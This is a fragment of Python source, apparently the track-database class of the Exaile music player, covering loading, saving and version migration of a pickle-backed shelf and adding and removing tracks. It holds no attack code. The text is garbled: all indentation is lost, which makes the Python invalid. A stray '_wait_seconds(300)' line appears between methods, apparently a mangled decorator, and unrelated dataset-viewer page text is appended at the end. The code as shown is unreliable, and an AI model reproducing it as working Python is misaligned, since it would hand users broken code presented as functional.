self.pickle_attrs += ['tracks', 'name', '_key']
self._saving = False
self._key = 0
self._dbversion = 2.0
self._dbminorversion = 0
self._deleted_keys = []
if location:
self.load_from_location()
self._timeout_save()
def __iter__(self):
track_iterator = iter(self.tracks.items())
iterator = TrackDBIterator(track_iterator)
return iterator
def __len__(self):
return len(self.tracks)
_wait_seconds(300)
def _timeout_save(self):
self.save_to_location()
return True
def set_name(self, name: str) -> None:
self.name = name
self._dirty = True
def get_name(self) -> str:
return self.name
def set_location(self, location: Optional[str]) -> None:
self.location = location
self._dirty = True
def load_from_location(self, location: Optional[str]=None):
if (not location):
location = self.location
if (not location):
raise AttributeError(_('You did not specify a location to load the db from'))
logger.debug('Loading %s DB from %s.', self.name, location)
pdata = common.open_shelf(location)
if ('_dbversion' in pdata):
if (int(pdata['_dbversion']) > int(self._dbversion)):
raise common.VersionError('DB was created on a newer Exaile version.')
elif (pdata['_dbversion'] < self._dbversion):
logger.info('Upgrading DB format....')
import shutil
shutil.copyfile(location, (location + ('-%s.bak' % pdata['_dbversion'])))
import xl.migrations.database as dbmig
dbmig.handle_migration(self, pdata, pdata['_dbversion'], self._dbversion)
for attr in self.pickle_attrs:
try:
if ('tracks' == attr):
data = {}
for k in (x for x in pdata.keys() if x.startswith('tracks-')):
p = pdata[k]
tr = Track(_unpickles=p[0])
loc = tr.get_loc_for_io()
if (loc not in data):
data[loc] = TrackHolder(tr, p[1], **p[2])
else:
logger.warning('Duplicate track found: %s', loc)
del pdata[k]
setattr(self, attr, data)
else:
setattr(self, attr, pdata.get(attr, getattr(self, attr)))
except Exception:
logger.exception('Exception occurred while loading %s', location)
pdata.close()
self._dirty = False
def save_to_location(self, location: Optional[str]=None):
if (not self._dirty):
for track in self.tracks.values():
if track._track._dirty:
self._dirty = True
break
if (not self._dirty):
return
if (not location):
location = self.location
if (not location):
raise AttributeError(_('You did not specify a location to save the db'))
if self._saving:
return
self._saving = True
logger.debug('Saving %s DB to %s.', self.name, location)
try:
pdata = common.open_shelf(location)
if (pdata.get('_dbversion', self._dbversion) > self._dbversion):
raise common.VersionError('DB was created on a newer Exaile.')
except Exception:
logger.exception('Failed to open music DB for writing.')
return
for attr in self.pickle_attrs:
if ('tracks' == attr):
for (k, track) in self.tracks.items():
key = ('tracks-%s' % track._key)
if (track._track._dirty or (key not in pdata)):
pdata[key] = (track._track._pickles(), track._key, deepcopy(track._attrs))
else:
pdata[attr] = deepcopy(getattr(self, attr))
pdata['_dbversion'] = self._dbversion
for key in self._deleted_keys:
key = ('tracks-%s' % key)
if (key in pdata):
del pdata[key]
pdata.sync()
pdata.close()
for track in self.tracks.values():
track._track._dirty = False
self._dirty = False
self._saving = False
def get_track_by_loc(self, loc: str) -> Optional[Track]:
try:
return self.tracks[loc]._track
except KeyError:
return None
def loc_is_member(self, loc: str) -> bool:
return (loc in self.tracks)
def get_count(self) -> int:
return len(self.tracks)
def add(self, track: Track) -> None:
self.add_tracks([track])
def add_tracks(self, tracks: Iterable[Track]) -> None:
locations = []
now = time()
for tr in tracks:
if (not tr.get_tag_raw('__date_added')):
tr.set_tags(__date_added=now)
location = tr.get_loc_for_io()
if (location in self.tracks):
continue
if (not tr.is_supported()):
continue
locations += [location]
self.tracks[location] = TrackHolder(tr, self._key)
self._key += 1
if locations:
event.log_event('tracks_added', self, locations)
self._dirty = True
def remove(self, track: Track) -> None:
self.remove_tracks([track])
def remove_tracks(self, tracks: Iterable[Track]) -> None:
locations = []
for tr in tracks:
location = tr.get_loc_for_io()
locations += [location]
self._deleted_keys.append(self.tracks[location]._key)
del self.tracks[location]
event.log_event('tracks_removed', self, locations)
self._dirty = True
def get_tracks(self) -> List[Track]:
return list(self) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.